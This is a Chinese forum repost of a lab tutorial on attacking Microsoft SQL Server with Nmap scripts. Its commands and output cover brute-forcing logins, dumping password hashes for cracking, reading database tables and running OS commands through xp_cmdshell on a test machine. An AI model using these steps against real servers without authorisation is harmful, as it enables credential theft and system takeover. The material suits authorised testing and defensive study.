|
|
原文链接:利用Nmap对MSSQL进行渗透测试
利用nmap脚本对MS SQL Server 进行渗透测试,获取目标用户名、数据库表等信息。
准备阶段
攻击机器:Kali (装有nmap)
目标机器:Windows Server 2019 (安装SQL Server 2016)
nmap自带一系列用于测试的脚本,用于mssql的脚本可以通过如下语句查询:
- $ locate *.nse | grep ms-sql
- /usr/share/nmap/scripts/broadcast-ms-sql-discover.nse
- /usr/share/nmap/scripts/ms-sql-brute.nse
- /usr/share/nmap/scripts/ms-sql-config.nse
- /usr/share/nmap/scripts/ms-sql-dac.nse
- /usr/share/nmap/scripts/ms-sql-dump-hashes.nse
- /usr/share/nmap/scripts/ms-sql-empty-password.nse
- /usr/share/nmap/scripts/ms-sql-hasdbaccess.nse
- /usr/share/nmap/scripts/ms-sql-info.nse
- /usr/share/nmap/scripts/ms-sql-ntlm-info.nse
- /usr/share/nmap/scripts/ms-sql-query.nse
- /usr/share/nmap/scripts/ms-sql-tables.nse
- /usr/share/nmap/scripts/ms-sql-xp-cmdshell.nse
获取数据库版本信息使用ms-sql-info脚本获取目标数据库版本等信息
- nmap -p 1433 -Pn --script ms-sql-info 192.168.91.133
- //-p 表示指定端口号、-Pn:不检测主机存活、--script 指定脚本
获取的信息如下: 
用户凭证爆破
使用ms-sql-brute脚本可以对数据库用户名和密码进行枚举和爆破
- nmap -p 1433 -Pn --script ms-sql-brute --script-args userdb=mssql_user.txt,passdb=mssql_pass.txt 192.168.91.133
- // --script-args 指定脚本参数;userdb= 指定用户名字典 ;passdb= 指定密码字典
结果如下:
得到的用户名和密码:
- sa:Password@123
- pentest:123456
执行SQL语句
利用前面得到的凭据,可以调用nmap的ms-sql-query脚本在目标上执行SQL查询
用法如下:
nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="SQL查询语句" 192.168.91.133
列出目标上的所有数据库
- nmap -p1433 -Pn --script ms-sql-query --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-query.query="sp_databases" 192.168.91.133
- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
- Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 01:57 EDT
- Nmap scan report for 192.168.91.133
- Host is up (0.00051s latency).
- PORT STATE SERVICE
- 1433/tcp open ms-sql-s
- | ms-sql-query:
- | [192.168.91.133:1433]
- | Query: sp_databases
- | DATABASE_NAME DATABASE_SIZE REMARKS
- | ============= ============= =======
- | master 7552 Null
- | model 16384 Null
- | msdb 21888 Null
- |_ tempdb 16384 Null
- Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
NetBIOS 信息收集
利用ms-sql-ntlm-info脚本对启用 了NTLM 身份验证的远程SQL Server主机NetBIOS信息进行收集。
原理是发送无效域和空凭据的MS-TDS NTLM 身份验证请求将导致远程服务以 NTLMSSP 消息进行响应,该消息会泄露包括 NetBIOS、DNS 和操作系统版本信息。
- nmap -p1433 -Pn --script ms-sql-ntlm-info 192.168.91.133
- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
- Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:08 EDT
- Nmap scan report for 192.168.91.133
- Host is up (0.00053s latency).
- PORT STATE SERVICE
- 1433/tcp open ms-sql-s
- | ms-sql-ntlm-info:
- | Target_Name: WIN-8EIGFF6H8PR
- | NetBIOS_Domain_Name: WIN-8EIGFF6H8PR
- | NetBIOS_Computer_Name: WIN-8EIGFF6H8PR
- | DNS_Domain_Name: WIN-8EIGFF6H8PR
- | DNS_Computer_Name: WIN-8EIGFF6H8PR
- |_ Product_Version: 10.0.17763
MSSQL 密码哈希转储使用ms-sql-dump-hashes可以导出mssql密码哈希,可以提供给John-the-ripper这类工具使用。
- nmap -p 1433 -Pn --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
- Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:22 EDT
- Nmap scan report for 192.168.91.133
- Host is up (0.0011s latency).
- PORT STATE SERVICE
- 1433/tcp open ms-sql-s
- | ms-sql-dump-hashes:
- | [192.168.91.133:1433]
- | sa:0x02002df771b8ffe860cb75e4bea87df48dd2fc38c35566eed3bf636aa962b2a24768387120df74d775627ea8ab10cd2339b525706fa0f68cbdff4580fcfddef2cb98493cce87
- | ##MS_PolicyEventProcessingLogin##:0x02001be8e4066350f72d7043e3b6fe080efb16a0cf424a4a1f078d84509d013946acaf49c08fdb534044432e474422769e4d43baa399bb094aa532e1333f6ec9c4eb01b4120c
- | ##MS_PolicyTsqlExecutionLogin##:0x02002f2e008251ee080daa07829e49ef4baf8624e26bc34a37096691751f83b4d7122f8bf1015db9ba5a519f483da5d366712c0fc54f8250ae8ce38db43e8e9f616cd0faab97
- |_ pentest:0x020025bc596aaf94a1f764ccaca6cd6d0615cfba0f01140879c21df33959e492254ef66d53ddbfb0c961e3f04bfb376294d7194fcd61b0b6b85b06387d6f975b92a779544ab6
- Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
命令执行
xp_cmdshell 是 Microsoft SQL Server 的一项功能,它允许系统管理员执行操作系统命令。默认情况下,xp_cmdshell 选项是禁用的。如果在目标服务器中启用了 xp_cmdshell,可以利用ms-sql-xp-cmdshell脚本在目标机器上执行系统命令。
- nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
- //ms-sql-xp-cmdshell.cmd= 指定要执行的命令
- nmap -p1433 -Pn --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@123,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.91.133
- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
- Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:28 EDT
- Nmap scan report for 192.168.91.133
- Host is up (0.00047s latency).
- PORT STATE SERVICE
- 1433/tcp open ms-sql-s
- | ms-sql-xp-cmdshell:
- | [192.168.91.133:1433]
- | Command: ipconfig
- | output
- | ======
- | Null
- | Windows IP \xE9\x85\x8D\xE7\xBD\xAE
- | Null
- | Null
- | \xE4\xBB\xA5\xE5\xA4\xAA\xE7\xBD\x91\xE9\x80\x82\xE9\x85\x8D\xE5\x99\xA8 Ethernet0:
- | Null
- | \xE8\xBF\x9E\xE6\x8E\xA5\xE7\x89\xB9\xE5\xAE\x9A\xE7\x9A\x84 DNS \xE5\x90\x8E\xE7\xBC\x80 . . . . . . . : localdomain
- | \xE6\x9C\xAC\xE5\x9C\xB0\xE9\x93\xBE\xE6\x8E\xA5 IPv6 \xE5\x9C\xB0\xE5\x9D\x80. . . . . . . . : fe80::c0cf:a5e8:ba66:9b8d%6
- | IPv4 \xE5\x9C\xB0\xE5\x9D\x80 . . . . . . . . . . . . : 192.168.91.133
- | \xE5\xAD\x90\xE7\xBD\x91\xE6\x8E\xA9\xE7\xA0\x81 . . . . . . . . . . . . : 255.255.255.0
- | \xE9\xBB\x98\xE8\xAE\xA4\xE7\xBD\x91\xE5\x85\xB3. . . . . . . . . . . . . : 192.168.91.2
- |_ Null
空密码登录测试如果管理员将密码设置为空,那么攻击者就可以直接登录到数据库。
利用ms-sql-empty-password脚本可以对目标进行SQL Server 空密码登录测试
- nmap -p1433 -Pn --script ms-sql-empty-password 192.168.91.133
- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
- Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 02:36 EDT
- Nmap scan report for 192.168.91.133
- Host is up (0.00056s latency).
- PORT STATE SERVICE
- 1433/tcp open ms-sql-s
- | ms-sql-empty-password:
- | [192.168.91.133:1433]
- |_ sa:<empty> => Login Success
- Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
查看数据库表ms-sql-tables脚本可以列出目标的数据库表
Tips:默认情况下MSSQL中没有数据库,要新建一个数据库和插入表,不然执行下列脚本会报错。
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
- nmap -p1433 -Pn --script ms-sql-tables --script-args mssql.username=sa,mssql.password=Password@123 192.168.91.133
- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
- Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 04:28 EDT
- Nmap scan report for 192.168.91.133
- Host is up (0.00079s latency).
- PORT STATE SERVICE
- 1433/tcp open ms-sql-s
- | ms-sql-tables:
- | [192.168.91.133:1433]
- | pentest
- | table column type length
- | ===== ====== ==== ======
- | Table_1 password nchar 40
- | Table_1 username nchar 40
- |
- | Restrictions
- | Output restricted to 2 tables (see ms-sql-tables.maxtables)
- | Output restricted to 5 databases (see ms-sql-tables.maxdb)
- |_ No filter (see ms-sql-tables.keywords)
- Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
|
|
发表于 2021-12-2 16:45:04